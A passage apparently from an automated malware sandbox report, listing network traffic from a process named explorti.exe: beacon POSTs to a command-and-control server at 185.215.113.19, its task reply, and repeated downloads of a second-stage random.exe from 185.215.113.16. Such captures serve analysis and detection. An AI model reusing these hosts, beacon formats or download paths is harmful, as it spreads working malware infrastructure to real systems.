Sep 1, 2024 17:37:02.924355030 CEST	49771	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.930152893 CEST	80	49771	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.930259943 CEST	49771	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.930577993 CEST	49771	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.936052084 CEST	80	49771	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.936171055 CEST	49771	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.936199903 CEST	49771	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.936209917 CEST	80	49771	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.941620111 CEST	49772	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.941951036 CEST	80	49771	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.941955090 CEST	80	49771	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.947237015 CEST	80	49772	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.947345018 CEST	49772	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.947720051 CEST	49772	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.953206062 CEST	80	49772	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.953275919 CEST	49772	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.953298092 CEST	49772	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:02.953376055 CEST	80	49772	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.958304882 CEST	80	49772	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:02.960195065 CEST	80	49772	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.064680099 CEST	49773	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.069508076 CEST	80	49773	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.069639921 CEST	49773	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.069722891 CEST	49773	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.074884892 CEST	80	49773	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.074949980 CEST	80	49773	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.074959040 CEST	49773	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.074979067 CEST	49773	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.075608015 CEST	49774	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.079691887 CEST	80	49773	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.079751015 CEST	80	49773	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.080355883 CEST	80	49774	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.080462933 CEST	49774	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.080569029 CEST	49774	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.085536003 CEST	80	49774	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.085602045 CEST	80	49774	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.085612059 CEST	49774	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.085670948 CEST	49774	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.090384007 CEST	80	49774	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.090464115 CEST	80	49774	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.190901041 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.197848082 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.201803923 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.201925993 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.423065901 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:03.459429026 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:03.465229988 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:04.208400965 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:04.208528996 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:04.228508949 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:04.235399008 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:04.604511976 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:04.604634047 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:04.612768888 CEST	49776	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:04.618133068 CEST	80	49776	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:04.618277073 CEST	49776	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:04.618339062 CEST	49776	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:04.629138947 CEST	80	49776	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:04.629221916 CEST	80	49776	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:04.629234076 CEST	49776	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:04.629261971 CEST	49776	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:04.634125948 CEST	80	49776	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:04.634130001 CEST	80	49776	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:09.642653942 CEST	49777	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:09.647595882 CEST	80	49777	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:09.647660017 CEST	49777	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:09.647792101 CEST	49777	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:09.653033018 CEST	80	49777	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:09.653094053 CEST	49777	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:09.653146029 CEST	49777	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:09.653322935 CEST	80	49777	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:09.658889055 CEST	80	49777	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:09.658934116 CEST	80	49777	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:14.666168928 CEST	49778	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:14.671020031 CEST	80	49778	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:14.671134949 CEST	49778	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:14.671273947 CEST	49778	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:14.676259995 CEST	80	49778	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:14.676343918 CEST	49778	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:14.676350117 CEST	80	49778	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:14.676434994 CEST	49778	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:14.681199074 CEST	80	49778	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:14.681252956 CEST	80	49778	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:19.694300890 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:19.694664955 CEST	49779	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:19.840229034 CEST	80	49779	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:19.840432882 CEST	49779	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:19.841016054 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:19.841089010 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:19.984755039 CEST	49779	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:20.392621040 CEST	49779	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:20.470046043 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:20.470242023 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:20.829418898 CEST	49779	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:20.999885082 CEST	80	49779	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:21.001645088 CEST	80	49779	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:21.238028049 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:21.238367081 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:22.742021084 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:22.742271900 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:25.910119057 CEST	80	49775	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:25.910255909 CEST	49775	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:26.041918039 CEST	49783	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:26.046915054 CEST	80	49783	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:26.047753096 CEST	49783	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:26.051434040 CEST	49783	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:26.053261042 CEST	80	49783	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:26.053375006 CEST	49783	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:26.056291103 CEST	80	49783	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:26.058235884 CEST	80	49783	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:31.066652060 CEST	49784	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:31.071626902 CEST	80	49784	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:31.071747065 CEST	49784	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:31.071960926 CEST	49784	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:31.077183962 CEST	80	49784	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:31.077294111 CEST	49784	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:31.077339888 CEST	49784	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:31.077390909 CEST	80	49784	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:31.082335949 CEST	80	49784	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:31.082467079 CEST	80	49784	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:36.082941055 CEST	49785	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:37.094973087 CEST	49785	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:39.096740007 CEST	49785	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:45.099592924 CEST	49786	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:45.105638981 CEST	80	49786	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:45.105726957 CEST	49786	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:45.105902910 CEST	49786	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:45.111010075 CEST	80	49786	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:45.111093044 CEST	80	49786	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:50.127110004 CEST	49787	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:50.134917974 CEST	80	49787	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:50.135003090 CEST	49787	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:50.135140896 CEST	49787	80	192.168.2.4	185.215.113.16
Sep 1, 2024 17:37:50.141103029 CEST	80	49787	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:50.149878025 CEST	80	49787	185.215.113.16	192.168.2.4
Sep 1, 2024 17:37:55.160891056 CEST	49788	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:55.165735006 CEST	80	49788	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:55.165817022 CEST	49788	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:55.165942907 CEST	49788	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:37:55.170902014 CEST	80	49788	185.215.113.19	192.168.2.4
Sep 1, 2024 17:37:55.171444893 CEST	80	49788	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:00.174967051 CEST	49789	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:00.180916071 CEST	80	49789	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:00.181055069 CEST	49789	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:00.181507111 CEST	49789	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:00.187380075 CEST	80	49789	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:00.187433958 CEST	49789	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:00.187460899 CEST	49789	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:00.187541008 CEST	80	49789	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:00.193140030 CEST	80	49789	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:00.193149090 CEST	80	49789	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:05.192864895 CEST	49790	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:05.198832035 CEST	80	49790	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:05.199147940 CEST	49790	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:05.199372053 CEST	49790	80	192.168.2.4	185.215.113.19
Sep 1, 2024 17:38:05.204732895 CEST	80	49790	185.215.113.19	192.168.2.4
Sep 1, 2024 17:38:05.205365896 CEST	80	49790	185.215.113.19	192.168.2.4

HTTP Request Dependency Graph

185.215.113.19

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49763	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.370641947 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49764	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.382051945 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49765	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.508703947 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49766	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.525935888 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49767	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.651249886 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49768	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.673691988 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49769	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.790514946 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49770	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.809947968 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49771	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.930577993 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49772	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:02.947720051 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49773	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:03.069722891 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49774	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:03.080569029 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49775	185.215.113.19	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:03.201925993 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 17:37:03.423065901 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 17:37:04.208400965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 15:37:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 17:37:04.228508949 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Sep 1, 2024 17:37:04.604511976 CEST	466	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 15:37:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 31 33 0d 0a 20 3c 63 3e 31 30 30 30 30 35 31 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 32 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 30 65 65 66 65 62 38 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 113 <c>1000051000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000052000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000053001+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49776	185.215.113.16	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:04.618339062 CEST	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49777	185.215.113.16	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 17:37:09.647792101 CEST	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49778	185.215.113.16	80	8104	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
